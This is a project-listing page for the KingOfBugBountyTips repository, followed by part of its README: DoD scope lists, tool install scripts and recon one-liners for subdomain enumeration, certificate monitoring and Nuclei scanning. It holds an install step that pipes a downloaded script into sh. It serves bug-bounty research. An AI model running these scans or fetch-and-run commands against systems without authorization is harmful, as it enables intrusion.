KingOfBugBountyTips

Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..

5,108

933

5,108

View on GitHub

Top Related Projects

Resources-for-Beginner-Bug-Bounty-Hunters

11,599

A list of resources for those interested in getting started in bug bounties

bugbounty-cheatsheet

6,305

A list of interesting payloads, tips and tricks for bug bounty hunters.

bug-bounty-reference

4,044

Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-up that is categorized by the bug nature

Awesome-Bugbounty-Writeups

5,491

A curated list of bugbounty writeups (Bug type wise) , inspired from https://github.com/ngalongc/bug-bounty-reference

awesome-bug-bounty

5,354

A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.

public-bugbounty-programs

1,272

Community curated list of public bug bounty and responsible disclosure programs.

Quick Overview

KingOfBugBountyTips is a GitHub repository that serves as a comprehensive collection of tips, tools, and techniques for bug bounty hunters and security researchers. It provides a curated list of resources, methodologies, and best practices to help improve the effectiveness of bug hunting and vulnerability discovery.

Pros

Extensive collection of tools and techniques for various aspects of bug bounty hunting
Regularly updated with new content and community contributions
Well-organized structure, making it easy to find specific information
Includes both basic and advanced techniques, suitable for beginners and experienced hunters

Cons

Some tools and techniques may become outdated over time
Lacks detailed explanations or tutorials for each tool or technique
May overwhelm beginners due to the sheer volume of information
Some links may lead to external resources that are no longer available

Getting Started

To get started with KingOfBugBountyTips:

Visit the GitHub repository: https://github.com/KingOfBugbounty/KingOfBugBountyTips
Browse through the README.md file to get an overview of the available content
Explore specific sections that interest you, such as recon techniques, subdomain enumeration, or vulnerability scanners
Follow the links provided to learn more about individual tools or techniques
Consider starring the repository to stay updated with new additions and changes

Note: This is not a code library, so there are no code examples or installation instructions. The repository primarily serves as a reference and resource collection for bug bounty hunters.

Competitor Comparisons

Resources-for-Beginner-Bug-Bounty-Hunters

11,599

A list of resources for those interested in getting started in bug bounties

Pros of Resources-for-Beginner-Bug-Bounty-Hunters

More structured and organized content, with clear categories for different learning areas
Includes a wider range of resources, including articles, videos, and tools
Regularly updated with new content and contributions from the community

Cons of Resources-for-Beginner-Bug-Bounty-Hunters

Less focused on specific techniques and tools compared to KingOfBugBountyTips
May be overwhelming for absolute beginners due to the large amount of information

Code Comparison

While both repositories primarily focus on providing resources rather than code, KingOfBugBountyTips does include some command-line examples:

KingOfBugBountyTips:

echo "domain" | subfinder -silent | httpx -silent | nuclei -t nuclei-templates -o result

Resources-for-Beginner-Bug-Bounty-Hunters doesn't typically include code snippets, focusing instead on curating external resources.

Summary

Both repositories offer valuable resources for bug bounty hunters. KingOfBugBountyTips provides more specific techniques and tools, while Resources-for-Beginner-Bug-Bounty-Hunters offers a broader, more structured approach to learning. The choice between them depends on the user's experience level and learning style.

bugbounty-cheatsheet

6,305

A list of interesting payloads, tips and tricks for bug bounty hunters.

Pros of bugbounty-cheatsheet

More structured and organized content, with clear categories and subcategories
Includes detailed explanations and examples for various vulnerability types
Regularly updated with contributions from the community

Cons of bugbounty-cheatsheet

Less focus on specific tools and automation techniques
May be overwhelming for beginners due to the extensive amount of information
Lacks real-world examples or case studies

Code Comparison

bugbounty-cheatsheet:

# Example of a subdomain takeover using Surge.sh
surge --domain <subdomain>.<target>.com

KingOfBugBountyTips:

# Subdomain enumeration using Subfinder and httpx
subfinder -d $1 | httpx -silent | anew

Both repositories provide valuable resources for bug bounty hunters, but they differ in their approach. bugbounty-cheatsheet offers a comprehensive guide with detailed explanations, while KingOfBugBountyTips focuses on practical tips and tools for automation. The choice between the two depends on the user's experience level and specific needs in their bug bounty journey.

bug-bounty-reference

4,044

Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-up that is categorized by the bug nature

Pros of bug-bounty-reference

More comprehensive and structured organization of resources
Includes a wider range of topics and vulnerability types
Regularly updated with new content and resources

Cons of bug-bounty-reference

Less focus on specific tools and techniques
May be overwhelming for beginners due to the large amount of information
Lacks the concise, tip-based format of KingOfBugBountyTips

Code comparison

While both repositories primarily consist of markdown files and don't contain much actual code, KingOfBugBountyTips does include some command-line examples:

KingOfBugBountyTips:

echo "domain" | subfinder -silent | httpx -silent | nuclei -t nuclei-templates -o result

bug-bounty-reference doesn't typically include command-line examples, focusing more on explanations and links to resources.

Summary

bug-bounty-reference offers a more comprehensive and structured approach to bug bounty resources, making it ideal for researchers looking for in-depth information on various vulnerability types. However, it may be less accessible for beginners and lacks the quick-tip format of KingOfBugBountyTips. The latter is more focused on practical tools and techniques, making it better suited for those looking for immediate, actionable tips.

Awesome-Bugbounty-Writeups

5,491

A curated list of bugbounty writeups (Bug type wise) , inspired from https://github.com/ngalongc/bug-bounty-reference

Pros of Awesome-Bugbounty-Writeups

Well-organized structure with categories for different vulnerability types
Includes a wide range of detailed writeups from various sources
Regularly updated with new content and contributions

Cons of Awesome-Bugbounty-Writeups

Focuses primarily on writeups, lacking practical tools and commands
May be overwhelming for beginners due to the large volume of content
Less emphasis on quick tips and one-liners for bug hunting

Code Comparison

KingOfBugBountyTips often includes practical command-line examples:

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Awesome-Bugbounty-Writeups typically doesn't include code snippets, instead focusing on explanatory content:

## SQL Injection
- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
- [SQL Injection Payload List](https://github.com/payloadbox/sql-injection-payload-list)

Summary

KingOfBugBountyTips is more focused on practical tips, tools, and commands for bug bounty hunters, while Awesome-Bugbounty-Writeups provides a comprehensive collection of detailed writeups and explanations. The former is better for quick reference and hands-on techniques, while the latter offers in-depth understanding of various vulnerabilities and exploitation methods.

awesome-bug-bounty

5,354

A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.

Pros of awesome-bug-bounty

More comprehensive and structured organization of resources
Includes a wider range of categories, such as tools, platforms, and educational materials
Regularly updated with new content and contributions from the community

Cons of awesome-bug-bounty

Less focus on specific techniques and tips for bug hunting
May be overwhelming for beginners due to the large amount of information
Lacks the concise, practical approach found in KingOfBugBountyTips

Code comparison

While both repositories primarily consist of curated lists and resources rather than actual code, KingOfBugBountyTips occasionally includes command-line examples:

KingOfBugBountyTips:

echo "domain" | waybackurls | grep -E "\.js(?:onp?)?$" | xargs -n1 -I{} sh -c 'echo {}; curl -sk {} | grep -oP "(?<=(\"|\''))\/[a-zA-Z0-9_\-]+"`

awesome-bug-bounty does not typically include code snippets, focusing instead on linking to external resources and tools.

Both repositories serve as valuable resources for bug bounty hunters, with KingOfBugBountyTips offering more practical tips and techniques, while awesome-bug-bounty provides a comprehensive collection of resources and tools for the bug bounty community.

public-bugbounty-programs

1,272

Community curated list of public bug bounty and responsible disclosure programs.

Pros of public-bugbounty-programs

Provides a comprehensive, structured list of public bug bounty programs
Regularly updated with new programs and changes
Includes additional metadata like program URLs and platform information

Cons of public-bugbounty-programs

Focuses solely on program listings, lacking specific tips or techniques
May not be as beginner-friendly for those new to bug bounty hunting
Less community-driven content compared to KingOfBugBountyTips

Code Comparison

public-bugbounty-programs:

- name: HackerOne
  url: https://hackerone.com/security
  bounty: true
  domains:
    - hackerone.com

KingOfBugBountyTips:

echo "example.com" | waybackurls | grep -E "\.js(?:onp?)?$" | anew | getjs

The code snippets highlight the different focus of each repository. public-bugbounty-programs uses YAML to structure program information, while KingOfBugBountyTips provides command-line tips for bug hunting techniques.

Both repositories serve valuable purposes in the bug bounty community. public-bugbounty-programs offers a centralized resource for finding active programs, while KingOfBugBountyTips provides practical tips and tools for conducting bug bounty hunts. The choice between them depends on whether you're looking for program listings or hunting techniques.

Convert designs to code with AI

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

KingOfBugBountyTips

The Ultimate Bug Bounty Reconnaissance Arsenal

"In the shadows we hunt, in the code we trust"

Telegram | Twitter | YouTube | LinkedIn

DoD VDP Scope

DoD Vulnerability Disclosure Program | KingRecon DOD

Full DoD Scope - 19 Domains

# BBRF Scope - All DoD Domains
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'

Military Branches	DoD Agencies	Support Commands
`*.af.mil` - Air Force	`*.pentagon.mil` - Pentagon HQ	`*.dtic.mil` - Tech Info Center
`*.army.mil` - Army	`*.osd.mil` - Office of SecDef	`*.dau.mil` - Acquisition Univ
`*.marines.mil` - Marines	`*.disa.mil` - Defense Info Systems	`*.health.mil` - Military Health
`*.navy.mil` - Navy	`*.dtra.mil` - Threat Reduction	`*.ng.mil` - National Guard
`*.spaceforce.mil` - Space Force	`*.dla.mil` - Logistics Agency	`*.uscg.mil` - Coast Guard
`*.ussf.mil` - Space Force	`*.dcma.mil` - Contract Management	`*.socom.mil` - Special Operations

Security Notice

This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.

ð Click to read our Security Policy & Guidelines

â Permitted Use Cases

â Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
â Authorized Penetration Testing - With written permission
â Personal Lab Environments - Your own infrastructure
â Educational Purposes - Learning and research
â DoD VDP Program - Following program rules

â Prohibited Activities

â Unauthorized Testing - Testing without explicit permission
â Malicious Intent - Using techniques for harm or theft
â Out-of-Scope Testing - Testing targets outside program scope
â Social Engineering - Unless explicitly allowed in program
â DoS/DDoS Attacks - Resource exhaustion attacks

ð Responsible Disclosure Guidelines

Read the Program Policy - Always review scope and rules
Test Safely - Don't cause harm to production systems
Document Everything - Keep detailed notes of your findings
Report Privately - Use official channels for disclosure
Give Time to Fix - Allow vendors reasonable time to patch
Be Professional - Maintain ethical standards

ð Report Security Issues

Found a security issue in this repository? Please report it responsibly:

ð Table of Contents

Click to expand navigation

Section	Description
About	Project overview and goals
Quick Start	Get started in 5 minutes
Required Tools	Essential toolset
BBRF Scope DoD	DoD scope configuration
Subdomain Enumeration	Finding subdomains
JavaScript Recon	JS file analysis
XSS Detection	Cross-site scripting
SQL Injection	SQLi techniques
SSRF & SSTI	Server-side attacks
Web Crawling	Deep crawling methods
Parameter Discovery	Hidden params
Content Discovery	Sensitive files
Nuclei Scanning	Automated scanning
API Security Testing	API vulnerabilities
Cloud Security	AWS, GCP, Azure
Automation Scripts	Ready-to-use scripts
Bash Functions	Shell productivity
New Oneliners 2026	CVE-2026 exploits & techniques
Oneliners 2024-2025	Previous techniques
Search Engines	Hacker search engines
Wordlists	Best wordlists
Resources	Books, courses, blogs

ð¯ About

âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
â                 ð¯ MISSION STATEMENT ð¯                       â
â ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ£
â  Share elite bug bounty techniques from world-class hunters   â
â  Build the most comprehensive one-liner collection           â
â  Empower the security research community                     â
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and vulnerabilities that are exploitable. We aim to influence and educate the community with powerful one-liner techniques for better understanding and faster results.

ð What Makes This Repository Special?

ð Curated Commands
_{Battle-tested from real hunters}

ð¯ Full Methodology
_{Recon to exploitation}

ð Constantly Updated
_{New techniques weekly}

ð Community Driven
_{Top hunters worldwide}

ð¦ Special Resources

ð Repository Highlights

ð Click to see detailed statistics

Category	Count	Status
One-Liners	400+	â Active
Techniques	50+	â Active
Tools Covered	100+	â Active
CVE Examples	20+	â Active
DoD Domains	19	â Active
Contributors	Growing	ð Growing
Last Update	2026	â Current

ð Quick Start

â¡ Get your first recon running in under 5 minutes

1ï¸â£ Install Tools

2ï¸â£ Run Recon

3ï¸â£ Find Bugs

# ð¥ Step 1: Install essential tools (ProjectDiscovery Suite)
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# ð Step 2: Run your first reconnaissance chain
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# ð Step 3: Analyze results and profit!
# Check the output for vulnerabilities and start reporting!

ð¬ Want a complete automated workflow? Click here!

# ð Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# ð Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

ð¯ Pro Tips for Beginners

Tip	Description
ð	Always get proper authorization before testing
ð	Keep detailed notes of your findings
ð ï¸	Start with automated tools, then manual testing
ð°	Focus on high-impact vulnerabilities first
ð¤	Join the community and learn from others

ð ï¸ Required Tools

Click to expand complete tool list

Core Tools

Category	Tools	Installation
Subdomain	Subfinder, Amass, Assetfinder, Findomain, Chaos	`go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest`
HTTP Probing	Httpx, Httprobe	`go install github.com/projectdiscovery/httpx/cmd/httpx@latest`
Crawling	Katana, Gospider, Hakrawler, Cariddi	`go install github.com/projectdiscovery/katana/cmd/katana@latest`
URLs	Gau, Waybackurls, Waymore	`go install github.com/lc/gau/v2/cmd/gau@latest`
Scanning	Nuclei, Jaeles, Naabu	`go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest`
XSS	Dalfox, XSStrike, Kxss, Airixss	`go install github.com/hahwul/dalfox/v2@latest`
SQLi	SQLMap, Ghauri	`pip install sqlmap ghauri`
Utilities	Anew, Qsreplace, Unfurl, Gf, Uro	`go install github.com/tomnomnom/anew@latest`
Fuzzing	Ffuf, Feroxbuster	`go install github.com/ffuf/ffuf/v2@latest`
JS Analysis	Subjs, LinkFinder, SecretFinder, Jsubfinder	`go install github.com/lc/subjs@latest`
Cert Monitoring	Certstream, Certstream-go	`pip install certstream`
DNS	Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen	`go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest`
Reverse DNS	Hakrevdns, Prips	`go install github.com/hakluke/hakrevdns@latest`
API Discovery	Arjun, x8, ParamSpider	`pip install arjun`
Screenshots	Gowitness, Eyewitness	`go install github.com/sensepost/gowitness@latest`
Cloud	AWS CLI, CloudEnum, S3Scanner	`pip install awscli`
OSINT	Shodan CLI, Censys, Metabigor	`pip install shodan censys`
Git Recon	Trufflehog, Gitrob, Github-Subdomains	`go install github.com/trufflesecurity/trufflehog/v3@latest`
Scope Management	BBRF	`pip install bbrf`

System Dependencies

# Ubuntu/Debian
sudo apt update && sudo apt install -y \
    jq \
    curl \
    wget \
    git \
    python3 \
    python3-pip \
    golang-go \
    nmap \
    masscan \
    chromium-browser \
    parallel \
    whois \
    dnsutils \
    libpcap-dev \
    build-essential

# macOS
brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

Go Environment Setup

# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Quick Install Script - Go Tools

#!/bin/bash
# One-click install for all Go tools

echo "[*] Installing Go tools..."
go_tools=(
    # ProjectDiscovery
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/projectdiscovery/dnsx/cmd/dnsx@latest"
    "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest"
    "github.com/projectdiscovery/chaos-client/cmd/chaos@latest"
    # Tomnomnom
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/tomnomnom/assetfinder@latest"
    "github.com/tomnomnom/httprobe@latest"
    # Fuzzing & Crawling
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
    "github.com/hakluke/hakrevdns@latest"
    # Security
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/lc/subjs@latest"
    # Screenshots & Utils
    "github.com/sensepost/gowitness@latest"
    "github.com/d3mondev/puredns/v2@latest"
    "github.com/j3ssie/metabigor@latest"
    "github.com/Emoe/kxss@latest"
    "github.com/ferreiraklet/airixss@latest"
    "github.com/edoardottt/cariddi/cmd/cariddi@latest"
    "github.com/trufflesecurity/trufflehog/v3@latest"
)

for tool in "${go_tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool" 2>/dev/null
done

echo "[â] Go tools installed!"

Quick Install Script - Python Tools

#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[â] Python tools installed!"

Quick Install Script - Rust Tools (Feroxbuster)

#!/bin/bash
# Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

# Install Rust if not present
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi

# Install Feroxbuster
cargo install feroxbuster

echo "[â] Rust tools installed!"

Quick Install Script - External Tools

#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[â] External tools installed!"

Master Install Script (All-in-One)

#!/bin/bash
# MASTER INSTALLER - Run all installation scripts

echo "ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ"
echo "â     KingOfBugBounty - Complete Tool Installation         â"
echo "ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ"

# System dependencies (run with sudo)
echo "[1/5] Installing system dependencies..."
sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

# Go environment
echo "[2/5] Setting up Go environment..."
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
source ~/.bashrc

# Go tools
echo "[3/5] Installing Go tools..."
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/katana/cmd/katana@latest
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest
go install -v github.com/tomnomnom/waybackurls@latest
go install -v github.com/tomnomnom/anew@latest
go install -v github.com/tomnomnom/qsreplace@latest
go install -v github.com/tomnomnom/unfurl@latest
go install -v github.com/tomnomnom/gf@latest
go install -v github.com/tomnomnom/assetfinder@latest
go install -v github.com/ffuf/ffuf/v2@latest
go install -v github.com/hahwul/dalfox/v2@latest
go install -v github.com/lc/gau/v2/cmd/gau@latest
go install -v github.com/jaeles-project/gospider@latest
go install -v github.com/hakluke/hakrawler@latest
go install -v github.com/hakluke/hakrevdns@latest
go install -v github.com/sensepost/gowitness@latest
go install -v github.com/d3mondev/puredns/v2@latest
go install -v github.com/owasp-amass/amass/v4/...@master

# Python tools
echo "[4/5] Installing Python tools..."
pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

# Rust tools
echo "[5/5] Installing Rust tools..."
if ! command -v cargo &> /dev/null; then
    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
    source $HOME/.cargo/env
fi
cargo install feroxbuster

# Update Nuclei templates
nuclei -update-templates

echo ""
echo "ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ"
echo "â            â Installation Complete!                      â"
echo "ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ"
echo ""
echo "Run 'source ~/.bashrc' to reload your environment"

Wordlists Installation

#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[â] Wordlists installed in $WORDLIST_DIR"

Verify Installation

#!/bin/bash
# Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do
    if command -v $tool &> /dev/null; then
        echo "[â] $tool"
    else
        echo "[â] $tool - NOT FOUND"
    fi
done

ð¯ BBRF Scope DoD

# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

ð Subdomain Enumeration â ï¸

âââââââââââ   ââââââââââ âââââââ  âââââââ ââââ   ââââ ââââââ âââââââ   âââ
âââââââââââ   âââââââââââââââââââââââââââââââââ âââââââââââââââââââââ  âââ
âââââââââââ   ââââââââââââââ  ââââââ   âââââââââââââââââââââââââââââââ âââ
âââââââââââ   ââââââââââââââ  ââââââ   âââââââââââââââââââââââââââââââââââ
âââââââââââââââââââââââââââââââââââââââââââââ âââ ââââââ  âââââââââ ââââââ
ââââââââ âââââââ âââââââ âââââââ  âââââââ âââ     ââââââ  âââââââââ  âââââ

â ï¸ ENUMERATE EVERYTHING â ï¸

ð Multi-Source Discovery (All-in-One)

# â ï¸ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt

ð Certificate Transparency Logs

# â ï¸ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

ð Certstream Real-Time Monitoring - Basic

# â ï¸ Monitor certificates in real-time for specific keyword
pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

ð Certstream with Domain Filter

# â ï¸ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

ð Certstream to Subdomain Discovery

# â ï¸ Extract all SANs (Subject Alternative Names) in real-time
certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt

ð Certstream + httpx Live Pipeline

# â ï¸ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

ð Certstream Phishing Detection

# â ï¸ Monitor for potential phishing domains (brand impersonation)
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt

ð Certstream with Nuclei Auto-Scan

# â ï¸ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

ð Certstream Mass Collector Script

# â ï¸ Collect all certificates for specific TLDs
timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

ð Certstream Wildcard Certificate Hunter

# â ï¸ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

ð Certstream + Shodan Enrichment

# â ï¸ Real-time certs -> resolve IP -> Shodan lookup
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

ð Certstream JSON Logger with Timestamp

# â ï¸ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

ð Certstream Bug Bounty Scope Monitor

# â ï¸ Monitor multiple bug bounty targets simultaneously
TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

ð Shodan + Nuclei Pipeline

# â ï¸ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

ð ASN Discovery & Reverse DNS

# â ï¸ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

ð DNS Bruteforce with Shuffledns

shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

ð Recursive Subdomain Enum

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

ð Passive DNS - Multiple Sources

# â ï¸ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# â ï¸ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# â ï¸ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# â ï¸ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# â ï¸ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

ð GitHub Subdomain Scraping

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

ð Censys Subdomain Discovery

# â ï¸ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

ð SecurityTrails API

# â ï¸ SecurityTrails subdomain enumeration
